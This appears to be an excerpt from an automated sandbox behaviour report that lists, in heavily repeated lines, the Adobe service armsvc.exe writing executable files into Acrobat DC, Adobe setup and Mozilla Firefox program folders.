Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
